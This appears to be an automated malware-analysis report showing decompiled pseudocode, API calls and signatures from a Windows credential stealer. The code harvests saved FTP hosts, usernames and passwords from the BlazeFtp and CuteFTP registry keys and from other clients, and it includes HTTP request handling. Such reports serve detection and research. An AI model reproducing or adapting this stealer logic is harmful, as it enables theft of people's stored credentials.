                                                                    • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                                                                    • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                                    • API String ID: 4072649068-555445111
                                                                    • Opcode ID: 9b4a33679b9f5da03f179997dbc4edbb3de2beb14b5e86672144839bbb3afef6
                                                                    • Instruction ID: 2c93f55174f4879a4db6f1b7e4dd790b8fca9e33e28acec0cc160ac5bd5080f0
                                                                    • Opcode Fuzzy Hash: 9b4a33679b9f5da03f179997dbc4edbb3de2beb14b5e86672144839bbb3afef6
                                                                    • Instruction Fuzzy Hash: 7041F672D04209EAEF11AFA1CC41BEDBEBAFF04305F10403AF510B52A1D7B95A569B19
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040D5C0(intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				intOrPtr _v2088;
                                                                    				long _t46;
                                                                    				long _t47;
                                                                    				long _t50;
                                                                    
                                                                    				_t46 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                    				_t47 = _t46;
                                                                    				if(_t47 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t50 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t51 = _t50;
                                                                    						if(_t50 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2088 = E00401DF8( &_v2064, E00401DF8(_t51, _a8, "\\"),  &_v2064);
                                                                    						E004018B8(_t52);
                                                                    						_v2068 = E00401D71( *0x414869, _v2088, "Host", 0);
                                                                    						_v2072 = E00401D71( *0x414869, _v2088, "User", 0);
                                                                    						_v2076 = E00401D71( *0x414869, _v2088, "Pass", 0);
                                                                    						_v2080 = E00401D71( *0x414869, _v2088, "Port", 0);
                                                                    						_v2084 = E00401D71( *0x414869, _v2088, "Remote Dir", 0);
                                                                    						if(_v2072 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2068), _a4, _v2072), _a4, _v2076), _a4, _v2080), _a4, _v2084);
                                                                    						}
                                                                    						E0040D5C0(_a4, _v2088);
                                                                    						E004018B8(_v2088);
                                                                    						E004018B8(_v2068);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2084);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t47;
                                                                    			}

                                                                    Address column for the listing above: 0x0040d5d6 .. 0x0040d793; only the addresses were preserved, the instruction text was not.

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D5D6
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040D60A
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D78D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: Host$Pass$Port$Remote Dir$User
                                                                    • API String ID: 1332880857-1775099961
                                                                    • Opcode ID: 25950911e23618f4f12ae4368c0fa88c2745727d3b78f0d5148ddaa2483c3d76
                                                                    • Instruction ID: 1fd05541a01a89dffe010ef35692abe6d580daf26f61a96ca8e157ebfd96a9e0
                                                                    • Opcode Fuzzy Hash: 25950911e23618f4f12ae4368c0fa88c2745727d3b78f0d5148ddaa2483c3d76
                                                                    • Instruction Fuzzy Hash: 0641F435940118BADF227B61CD02FDC7ABABF44304F10C5B6B548740B1DB7A5A91AF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E0040C823(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				char _v32;
                                                                    				void* __edi;
                                                                    				intOrPtr _t34;
                                                                    				char* _t49;
                                                                    				intOrPtr _t53;
                                                                    				void* _t56;
                                                                    				void* _t57;
                                                                    				char* _t58;
                                                                    
                                                                    				_t57 = __ecx;
                                                                    				_t56 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x3f, 0);
                                                                    				_t58 =  *0x4147ed; // 0x640b38
                                                                    				if( *_t58 == 0) {
                                                                    					L5:
                                                                    					E0040439C(_a4, "\\BlazeFtp", "site.dat", 0xbeef0000); // executed
                                                                    					_t34 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPassword", 0); // executed
                                                                    					_v24 = _t34;
                                                                    					_v16 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastAddress", 0);
                                                                    					_v20 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastUser", 0);
                                                                    					_v28 = E00401D71( *0x414869, "Software\\FlashPeak\\BlazeFtp\\Settings", "LastPort",  &_v32);
                                                                    					if(_v16 != 0 && _v20 != 0) {
                                                                    						_t65 = _v24;
                                                                    						if(_v24 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0001), _a4, _v16), _a4, _v20), _a4, _v24);
                                                                    							E0040159F(_a4, _v28, _v32);
                                                                    						}
                                                                    					}
                                                                    					E004018B8(_v24);
                                                                    					E004018B8(_v16);
                                                                    					E004018B8(_v20);
                                                                    					E004018B8(_v28);
                                                                    					return E00401636(_t56, _t57, _t58, _t65, _a4, _v8);
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_t49 = StrStrIA(_t58, "BlazeFtp");
                                                                    					_t60 = _t49;
                                                                    					if(_t49 != 0) {
                                                                    						_t53 = E0040242B(_t60, _t58);
                                                                    						if(_t53 != 0) {
                                                                    							_v12 = _t53;
                                                                    							E00404351(_a4, _v12, "site.dat", 0xbeef0000);
                                                                    							E004018B8(_v12);
                                                                    						}
                                                                    					}
                                                                    					asm("cld");
                                                                    					_t57 = 0xffffffff;
                                                                    					asm("repne scasb");
                                                                    				} while ( *_t58 != 0);
                                                                    				goto L5;
                                                                    			}

                                                                    Address column for the listing above: 0x0040c823 .. 0x0040c987; only the addresses were preserved, the instruction text was not.

                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(00640B38,BlazeFtp), ref: 0040C84A
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                                      • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                      • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FreeLocal
                                                                    • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                                                    • API String ID: 1884169789-2976447346
                                                                    • Opcode ID: 47488ed6a2fbd4181536ff25fc21e10080c7204c1fc40f0ca6e583d0fb8b7ff6
                                                                    • Instruction ID: 2aaa60dbd0995c362339c6ee2767abb90b7bbf48d78d9c31007efe50a139024b
                                                                    • Opcode Fuzzy Hash: 47488ed6a2fbd4181536ff25fc21e10080c7204c1fc40f0ca6e583d0fb8b7ff6
                                                                    • Instruction Fuzzy Hash: DA311731940109BADF127BA1CC42FEE7E72AF80744F10863BB514351F1D7B99A919B8C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E004053C3(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* __edi;
                                                                    				char* _t28;
                                                                    				void* _t35;
                                                                    				void* _t36;
                                                                    				char* _t37;
                                                                    
                                                                    				_t36 = __ecx;
                                                                    				_t35 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 4, 0);
                                                                    				_t37 =  *0x4147ed; // 0x640b38
                                                                    				if( *_t37 == 0) {
                                                                    					L5:
                                                                    					E0040531A(_t36, _t41, _a4, 0x1a); // executed
                                                                    					E0040531A(_t36, _t41, _a4, 0x23); // executed
                                                                    					E0040531A(_t36, _t41, _a4, 0x1c); // executed
                                                                    					E0040531A(_t36, _t41, _a4, 0x26); // executed
                                                                    					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Home\\QCToolbar"); // executed
                                                                    					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 6 Professional\\QCToolbar"); // executed
                                                                    					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Home\\QCToolbar"); // executed
                                                                    					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 7 Professional\\QCToolbar"); // executed
                                                                    					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Home\\QCToolbar"); // executed
                                                                    					E00405199(_a4, "Software\\GlobalSCAPE\\CuteFTP 8 Professional\\QCToolbar"); // executed
                                                                    					return E00401636(_t35, _t36, _t37, _t41, _a4, _v8);
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_t28 = StrStrIA(_t37, "CUTEFTP"); // executed
                                                                    					_t39 = _t28;
                                                                    					if(_t28 != 0) {
                                                                    						_t32 = E0040242B(_t39, _t37);
                                                                    						if(E0040242B(_t39, _t37) != 0) {
                                                                    							E004051E3(_t36, _a4, _t32, "\\sm.dat");
                                                                    							E004018B8(_t32);
                                                                    						}
                                                                    					}
                                                                    					asm("cld");
                                                                    					_t36 = 0xffffffff;
                                                                    					asm("repne scasb");
                                                                    					_t41 =  *_t37;
                                                                    				} while ( *_t37 != 0);
                                                                    				goto L5;
                                                                    			}

                                                                    Address column for the listing above: 0x004053c3 .. 0x004054a2; only the addresses were preserved, the instruction text was not.

                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(00640B38,CUTEFTP), ref: 004053EA
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                                      • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                      • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405447
                                                                    • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 0040547B
                                                                    • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405454
                                                                    • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 00405488
                                                                    • CUTEFTP, xrefs: 004053E4
                                                                    • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 00405461
                                                                    • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 0040546E
                                                                    • \sm.dat, xrefs: 004053FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FreeLocal
                                                                    • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                                                                    • API String ID: 1884169789-2738976122
                                                                    • Opcode ID: f848c49cb20d6f1ba6bb938085becd1c3ada2ade320e3e777dafe4c2c13884a6
                                                                    • Instruction ID: d288d778f3b0420d84bf39ae9e8e3b7741dd64c7b166df527bd21b083190309a
                                                                    • Opcode Fuzzy Hash: f848c49cb20d6f1ba6bb938085becd1c3ada2ade320e3e777dafe4c2c13884a6
                                                                    • Instruction Fuzzy Hash: 6011F174550A04BADF123F21CC02FDE3E61EB91785F10413AB9087C0E6DBB98A919E9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E00403A78(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char** _a12) {
                                                                    				char* _v8;
                                                                    				int _v12;
                                                                    				void* _v16;
                                                                    				void* __edi;
                                                                    				void* __ebp;
                                                                    				void* _t39;
                                                                    				char* _t47;
                                                                    				char* _t48;
                                                                    				char* _t49;
                                                                    				char* _t50;
                                                                    				void* _t52;
                                                                    				char* _t54;
                                                                    				char* _t56;
                                                                    				char* _t64;
                                                                    				char** _t78;
                                                                    				void* _t79;
                                                                    				char* _t81;
                                                                    				char* _t82;
                                                                    				void* _t83;
                                                                    				char* _t85;
                                                                    				char* _t86;
                                                                    				void* _t87;
                                                                    				void* _t88;
                                                                    
                                                                    				_t88 = __eflags;
                                                                    				_v8 = E004018CF(0x3a98);
                                                                    				E00401000( &_v16, __ecx, _t88,  &_v16);
                                                                    				_t64 = 0;
                                                                    				while(1) {
                                                                    					_push(0x1e);
                                                                    					_t39 = E00403930(_t79, _a4, _v16, 0xfa00, 0xa); // executed
                                                                    					_t90 = _t39;
                                                                    					if(_t39 == 0 || E00401082(_t39, _t79, _t90, _v16) > 0xfa00) {
                                                                    						break;
                                                                    					}
                                                                    					__eflags = E00403A2A(_v16);
                                                                    					if(__eflags == 0) {
                                                                    						continue;
                                                                    					}
                                                                    					E004012BB(_t44, __eflags);
                                                                    					 *((intOrPtr*)( *_v16 + 0xc))(_v16, _v8, 0x2134, 0, _v16);
                                                                    					_v12 = 0;
                                                                    					_t47 = StrStrIA(_v8, "Content-Length:");
                                                                    					_push(_t64);
                                                                    					_t48 = _t47;
                                                                    					__eflags = _t48;
                                                                    					if(_t48 != 0) {
                                                                    						_push("Content-Length:");
                                                                    						L0041066A();
                                                                    						_t85 =  &(_t48[_t48]);
                                                                    						_t86 =  &(_t85[1]);
                                                                    						asm("repne scasb");
                                                                    						__eflags = 0;
                                                                    						 *((char*)(_t86 - 1)) = 0;
                                                                    						_v12 = StrToIntA(_t86);
                                                                    						_t87 = _t86;
                                                                    						 *((char*)(_t87 - 1)) = 0xd;
                                                                    						_t79 = _t85;
                                                                    					}
                                                                    					_pop(_t65);
                                                                    					_t49 = StrStrIA(_v8, "Location:");
                                                                    					_t50 = _t49;
                                                                    					__eflags = _t50;
                                                                    					if(__eflags != 0) {
                                                                    						_push("Location:");
                                                                    						L0041066A();
                                                                    						_t81 =  &(_t50[_t50]);
                                                                    						_push(_t81);
                                                                    						_t82 =  &(_t81[1]);
                                                                    						asm("repne scasb");
                                                                    						 *((char*)(_t82 - 1)) = 0;
                                                                    						_push(_t82);
                                                                    						_t50 = E00402A1D(0, _t82);
                                                                    						_t78 = _a12;
                                                                    						__eflags = _t78;
                                                                    						if(__eflags == 0) {
                                                                    							_t50 = E004018B8(_t50);
                                                                    						} else {
                                                                    							 *_t78 = _t50;
                                                                    						}
                                                                    						_pop(_t83);
                                                                    						 *((char*)(_t83 - 1)) = 0xd;
                                                                    						_pop(_t79);
                                                                    					}
                                                                    					_pop(_t64);
                                                                    					_push(_v16);
                                                                    					E0040131F(_t50, __eflags);
                                                                    					__eflags = _v12;
                                                                    					if(_v12 <= 0) {
                                                                    						_v12 = 0xa00000;
                                                                    					}
                                                                    					_t52 = E004039A2(_a4, _v16, _v12); // executed
                                                                    					_t54 = E00401082(_t52, _t79, __eflags, _v16);
                                                                    					__eflags = _t54;
                                                                    					if(_t54 != 0) {
                                                                    						__eflags = _t54;
                                                                    						if(_t54 != 0) {
                                                                    							_t56 =  *((intOrPtr*)( *_v16 + 0x34))(_v16, _a8);
                                                                    							__eflags = _t56;
                                                                    							if(_t56 >= 0) {
                                                                    								_t64 = 1;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					break;
                                                                    				}
                                                                    				 *((intOrPtr*)( *_v16 + 8))(_v16);
                                                                    				E004018B8(_v8);
                                                                    				return _t64;
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                                    • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403B00
                                                                    • lstrlen.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403B11
                                                                    • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403B32
                                                                    • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 00403B49
                                                                    • lstrlen.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 00403B5A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$AllocLocal
                                                                    • String ID: Content-Length:$Location:
                                                                    • API String ID: 2140729754-2400408565
                                                                    • Opcode ID: ccb7a4c1303ead18c923505439b5974798f3e24fec900223be994b98bc23a5a7
                                                                    • Instruction ID: 887c3a052e585dbf08982f6133b0250286a7e5dbb1d34c025ab1b04810de1b55
                                                                    • Opcode Fuzzy Hash: ccb7a4c1303ead18c923505439b5974798f3e24fec900223be994b98bc23a5a7
                                                                    • Instruction Fuzzy Hash: 9541D731A04249BBDB10AFA5CC45F9DFF79EF80309F208177B510B52D1C7799A51DA54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00406D4F(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				char _v2088;
                                                                    				char _v2092;
                                                                    				long _t48;
                                                                    				long _t49;
                                                                    				long _t52;
                                                                    				intOrPtr* _t64;
                                                                    
                                                                    				_t48 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                    				_t49 = _t48;
                                                                    				if(_t49 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t52 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t53 = _t52;
                                                                    						if(_t52 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t53, _a8, "\\"),  &_v2064);
                                                                    						E004018B8(_t54);
                                                                    						_v2080 = E00401D71( *0x414869, _v2068, "Password",  &_v2092);
                                                                    						_v2072 = E00401D71( *0x414869, _v2068, "Hostname", 0);
                                                                    						_v2076 = E00401D71( *0x414869, _v2068, "Username", 0);
                                                                    						_t64 = E00401D71( *0x414869, _v2068, "Port",  &_v2088);
                                                                    						if(_t64 == 0 || _v2088 != 4) {
                                                                    							_t65 = _t64;
                                                                    							if(_t64 != 0) {
                                                                    								E004018B8(_t65);
                                                                    							}
                                                                    							_v2084 = 0x15;
                                                                    						} else {
                                                                    							 *_t22 =  *_t64;
                                                                    							E004018B8(_t64);
                                                                    						}
                                                                    						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0 && E004043DC(_v2080,  &_v2092, 0) != 0 && _v2092 != 0) {
                                                                    							E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076);
                                                                    							E0040159F(_a4, _v2080, _v2092);
                                                                    							E00401569(_a4, _v2084);
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t49;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 00406D65
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00406D99
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406F3A
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumFreeLocalOpen
                                                                    • String ID: Hostname$Password$Port$Username
                                                                    • API String ID: 3369285772-1811172798
                                                                    • Opcode ID: 11b58eb076e21b69a1e4d97b53ebb1a2393ccb16412e4d1246237f188232d0c9
                                                                    • Instruction ID: 500b27a2afeee4adcaf2e15fb58aabb2ec7cde25314abd0c379f5f2d99b47613
                                                                    • Opcode Fuzzy Hash: 11b58eb076e21b69a1e4d97b53ebb1a2393ccb16412e4d1246237f188232d0c9
                                                                    • Instruction Fuzzy Hash: 6041043590011CEADF216B61CC02BEDBAB9BF44304F10C5BAB149740F1DB7A5BA1AF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00406B1B(intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				intOrPtr _v2080;
                                                                    				intOrPtr _v2084;
                                                                    				char _v2088;
                                                                    				long _t43;
                                                                    				long _t44;
                                                                    				long _t47;
                                                                    				intOrPtr* _t58;
                                                                    
                                                                    				_t43 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                    				_t44 = _t43;
                                                                    				if(_t44 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t47 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t48 = _t47;
                                                                    						if(_t47 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t48, _a8, "\\"),  &_v2064);
                                                                    						E004018B8(_t49);
                                                                    						_v2080 = E00401D71( *0x414869, _v2068, "Password", 0);
                                                                    						_v2072 = E00401D71( *0x414869, _v2068, "Server", 0);
                                                                    						_v2076 = E00401D71( *0x414869, _v2068, "Username", 0);
                                                                    						_t58 = E00401D71( *0x414869, _v2068, "FtpPort",  &_v2088);
                                                                    						if(_t58 == 0 || _v2088 != 4) {
                                                                    							_t59 = _t58;
                                                                    							if(_t58 != 0) {
                                                                    								E004018B8(_t59);
                                                                    							}
                                                                    							_v2084 = 0x15;
                                                                    						} else {
                                                                    							 *_t21 =  *_t58;
                                                                    							E004018B8(_t58);
                                                                    						}
                                                                    						if(_v2080 != 0 && _v2072 != 0 && _v2076 != 0) {
                                                                    							E004015CB(E004015CB(E004015CB(E00401569(_a4, 0xbeef0000), _a4, _v2072), _a4, _v2076), _a4, _v2080);
                                                                    							E00401569(_a4, _v2084);
                                                                    						}
                                                                    						E004018B8(_v2080);
                                                                    						E004018B8(_v2072);
                                                                    						E004018B8(_v2076);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t44;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B31
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00406B65
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406CDA
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumFreeLocalOpen
                                                                    • String ID: FtpPort$Password$Server$Username
                                                                    • API String ID: 3369285772-1828875246
                                                                    • Opcode ID: 4b81514aff49bcdc6a24a146f02ba94d292b69dfe4c5f9afe9a9a02f5e1b98b0
                                                                    • Instruction ID: 7ba9846cf84e593e36bc471b668ef0c5a307549365de809292626744771520ce
                                                                    • Opcode Fuzzy Hash: 4b81514aff49bcdc6a24a146f02ba94d292b69dfe4c5f9afe9a9a02f5e1b98b0
                                                                    • Instruction Fuzzy Hash: BE41F43194011CEADF21AB61CC02BDD7AB9FF44304F10C5BAB549740F1DB795AA1AF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040E237(void* __ecx, void* _a4, char* _a8, intOrPtr _a12) {
                                                                    				void* _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				unsigned int _v32;
                                                                    				long _t50;
                                                                    				long _t51;
                                                                    
                                                                    				_t50 = RegOpenKeyA(_a4, _a8,  &_v8); // executed
                                                                    				_t51 = _t50;
                                                                    				if(_t51 != 0) {
                                                                    					return _t51;
                                                                    				}
                                                                    				_v12 = E00401D71(_a4, _a8, "Site", 0);
                                                                    				_v16 = E00401D71(_a4, _a8, "UserID", 0);
                                                                    				_v20 = E00401D71(_a4, _a8, "xflags",  &_v32);
                                                                    				_v24 = E00401D71(_a4, _a8, "Port", 0);
                                                                    				_v28 = E00401D71(_a4, _a8, "Folder", 0);
                                                                    				if(_v20 != 0 && _v32 != 0 && E00402B0D(_v20, _v32) != 0) {
                                                                    					_v32 = _v32 >> 1;
                                                                    					if(E004043DC(_v20,  &_v32, 0) != 0 && _v12 != 0 && _v16 != 0 && _v20 != 0) {
                                                                    						E004015CB(E004015CB(E00401569(_a12, 0xbeef0000), _a12, _v12), _a12, _v16);
                                                                    						E004015CB(E004015CB(E0040159F(_a12, _v20, _v32), _a12, _v24), _a12, _v28);
                                                                    					}
                                                                    				}
                                                                    				E004018B8(_v12);
                                                                    				E004018B8(_v16);
                                                                    				E004018B8(_v20);
                                                                    				E004018B8(_v24);
                                                                    				E004018B8(_v28);
                                                                    				return RegCloseKey(_v8);
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E247
